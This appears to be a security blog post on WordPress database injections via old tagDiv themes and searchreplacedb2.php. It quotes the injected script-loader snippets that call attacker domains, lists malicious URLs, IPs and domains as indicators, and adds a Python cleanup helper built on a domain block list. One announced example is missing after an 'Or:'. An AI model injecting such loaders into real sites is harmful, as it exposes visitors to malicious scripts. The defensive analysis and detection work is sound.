Old Themes, Abandoned Scripts and Pitfalls of Cleaning Serialized Data
Over the summer we’ve seen waves of WordPress database infections that use vulnerabilities in tagDiv’s Newspaper/Newsmag themes or InterconnectIT Search and Replace scripts (searchreplacedb2.php).
The injections range from ad scripts coming from established ad networks like shorte.st to new domains created specifically for those attacks.
Typical injected scripts look like this:
<s cript type='text/javascript' src='hxxps://con1.sometimesfree[.]biz/c.js'>
Or:
var t = document.createElement("script");
t.type = "text/javascript"; t.src = "hxxps://src[.]dancewithme[.]biz/src.js";
document.head.appendChild(t);
Or:
The most noticeable malicious URLs that we’ve seen lately are:
- con1.sometimesfree[.]biz/c.js (185.82.217.166, Bulgaria)
- java.sometimesfree[.]biz/counter.js (185.82.217.166, Bulgaria)
- javascript.sometimesfree[.]biz/script.js (185.82.217.166, Bulgaria)
- js.givemealetter[.]biz/script.js (185.82.217.166, Bulgaria)
- go.givemealetter[.]biz/click.html (185.82.217.166, Bulgaria)
- traffictrade[.]life/scripts.js (200.7.105.43, United Kingdom)
- blue.traffictrade[.]life/main.js (200.7.105.43, United Kingdom)
- js.trysomethingnew[.]eu/analytics.js (94.156.144.19, Bulgaria)
- get.simplefunsite[.]info/rw.js (does not resolve at the moment)
- post.simplefunsite[.]info/go.php?rewrite=81 (does not resolve at the moment)
- src.dancewithme[.]biz/src.js (185.159.82.2, Russia)
- go.dancewithme[.]biz/red.php (185.159.82.2, Russia)
They are all new domains registered specifically for this attack:
- traffictrade[.]life – created on July 3rd, 2017
- trysomethingnew[.]eu – created on August 11th, 2017
- sometimesfree[.]biz – created on August 22nd, 2017
- givemealetter[.]biz – created on August 27th, 2017
- simplefunsite[.]info – created on September 2nd, 2017
- dancewithme[.]biz – created on September 5th, 2017
Malware in WordPress Database
In most cases the scripts are injected right before <a href tags in the post content (wp_posts), meaning that webmasters may need to remove multiple injected scripts from hundreds of posts in the database – definitely not a task you want to do manually!
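As an added example (not code from the original post or from the affected themes), here is a Python cleanup helper that scans wp_posts content for the two injection forms shown above and strips only those whose loader URL points at one of the listed domains, leaving legitimate external scripts alone. The sample rows are constructed; the domain list is taken from the indicators above.

```python
import re

# Domains reported in the post; the constructed sample rows below reuse them
KNOWN_BAD_DOMAINS = (
    "sometimesfree.biz", "givemealetter.biz", "traffictrade.life",
    "trysomethingnew.eu", "simplefunsite.info", "dancewithme.biz",
)

# Form 1: <script type='text/javascript' src='https://...'> (closing tag optional)
EXTERNAL_SCRIPT = re.compile(
    r"""<script\b[^>]*\bsrc=['"](?P<src>[^'"]+)['"][^>]*>\s*(?:</script>)?""", re.I)
# Form 2: <script>var t = document.createElement("script"); ... t.src = "https://..."; ...</script>
INLINE_LOADER = re.compile(
    r"""<script\b[^>]*>(?P<body>(?:(?!</script>).)*?createElement\(['"]script['"]\)"""
    r"""(?:(?!</script>).)*?)</script>""", re.I | re.S)
SRC_IN_BODY = re.compile(r"""\.src\s*=\s*['"](?P<src>[^'"]+)['"]""")

def is_bad(url):
    """True when the URL's host is one of the listed domains or a subdomain of one."""
    host = re.sub(r"^(?:[a-z]+:)?//", "", url, flags=re.I).split("/")[0].lower()
    return any(host == d or host.endswith("." + d) for d in KNOWN_BAD_DOMAINS)

def clean_post_content(content):
    """Strip loader tags that point at listed domains; return (cleaned, removed_urls)."""
    removed = []
    def drop_external(m):
        if is_bad(m.group("src")):
            removed.append(m.group("src"))
            return ""
        return m.group(0)  # legitimate external script stays untouched
    def drop_inline(m):
        s = SRC_IN_BODY.search(m.group("body"))
        if s and is_bad(s.group("src")):
            removed.append(s.group("src"))
            return ""
        return m.group(0)
    content = EXTERNAL_SCRIPT.sub(drop_external, content)
    content = INLINE_LOADER.sub(drop_inline, content)
    return content, removed

def clean_rows(rows):
    """rows: iterable of (post_id, post_content). Returns {post_id: (cleaned, removed)} for hits only."""
    report = {}
    for post_id, body in rows:
        cleaned, removed = clean_post_content(body)
        if removed:
            report[post_id] = (cleaned, removed)
    return report

# Constructed wp_posts rows (ID, post_content), not real site data
SAMPLE_ROWS = [
    (101, "<p>Hello</p><script type='text/javascript' src='https://con1.sometimesfree.biz/c.js'><a href=\"https://example.com\">link</a>"),
    (102, "<p>x</p><script>var t = document.createElement(\"script\");t.type=\"text/javascript\";"
          "t.src=\"https://src.dancewithme.biz/src.js\";document.head.appendChild(t);</script><a href=\"/a\">a</a>"),
    (103, "<p>clean</p><script src=\"https://cdn.example.org/lib.js\"></script><a href=\"/b\">b</a>"),
]
```

Run it against a dump of post_content values first and review the returned report before writing anything back; the same matching applies to post_excerpt and similar text columns, but serialized option values need a serialization-aware tool rather than a plain string substitution.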